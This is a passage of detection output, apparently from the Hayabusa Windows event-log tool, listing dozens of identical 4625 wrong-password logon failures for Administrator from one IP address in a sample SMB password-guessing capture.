11362016-09-20 01:50:10.956 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11372016-09-20 01:50:11.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11382016-09-20 01:50:11.060 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11392016-09-20 01:50:11.105 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11402016-09-20 01:50:11.148 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11412016-09-20 01:50:11.180 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11422016-09-20 01:50:11.228 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11432016-09-20 01:50:11.269 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11442016-09-20 01:50:11.312 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11452016-09-20 01:50:11.348 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11462016-09-20 01:50:11.389 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11472016-09-20 01:50:11.432 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11482016-09-20 01:50:11.468 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11492016-09-20 01:50:11.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11502016-09-20 01:50:11.551 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11512016-09-20 01:50:11.592 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11522016-09-20 01:50:11.629 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11532016-09-20 01:50:11.666 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11542016-09-20 01:50:11.704 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11552016-09-20 01:50:11.744 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11562016-09-20 01:50:11.784 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11572016-09-20 01:50:11.836 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11582016-09-20 01:50:11.879 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11592016-09-20 01:50:11.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11602016-09-20 01:50:12.068 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11612016-09-20 01:50:12.109 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11622016-09-20 01:50:12.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11632016-09-20 01:50:12.208 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11642016-09-20 01:50:12.241 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11652016-09-20 01:50:12.294 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11662016-09-20 01:50:12.376 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11672016-09-20 01:50:12.417 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11682016-09-20 01:50:12.448 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11692016-09-20 01:50:12.495 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11702016-09-20 01:50:12.536 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11712016-09-20 01:50:12.582 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11722016-09-20 01:50:12.623 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11732016-09-20 01:50:12.660 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11742016-09-20 01:50:12.707 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11752016-09-20 01:50:12.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11762016-09-20 01:50:12.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11772016-09-20 01:50:12.811 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11782016-09-20 01:50:12.847 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11792016-09-20 01:50:12.891 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11802016-09-20 01:50:12.927 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11812016-09-20 01:50:12.963 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11822016-09-20 01:50:12.996 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11832016-09-20 01:50:13.045 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11842016-09-20 01:50:13.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11852016-09-20 01:50:13.125 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11862016-09-20 01:50:13.156 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11872016-09-20 01:50:13.195 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11882016-09-20 01:50:13.236 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11892016-09-20 01:50:13.280 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11902016-09-20 01:50:13.324 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11912016-09-20 01:50:13.364 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11922016-09-20 01:50:13.412 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11932016-09-20 01:50:13.447 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11942016-09-20 01:50:13.487 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11952016-09-20 01:50:13.528 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11962016-09-20 01:50:13.564 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11972016-09-20 01:50:13.612 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11982016-09-20 01:50:13.652 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11992016-09-20 01:50:13.683 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12002016-09-20 01:50:13.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12012016-09-20 01:50:13.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12022016-09-20 01:50:13.796 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12032016-09-20 01:50:13.834 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12042016-09-20 01:50:13.860 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12052016-09-20 01:50:13.895 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12062016-09-20 01:50:13.935 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12072016-09-20 01:50:13.976 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12082016-09-20 01:50:14.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12092016-09-20 01:50:14.052 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12102016-09-20 01:50:14.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
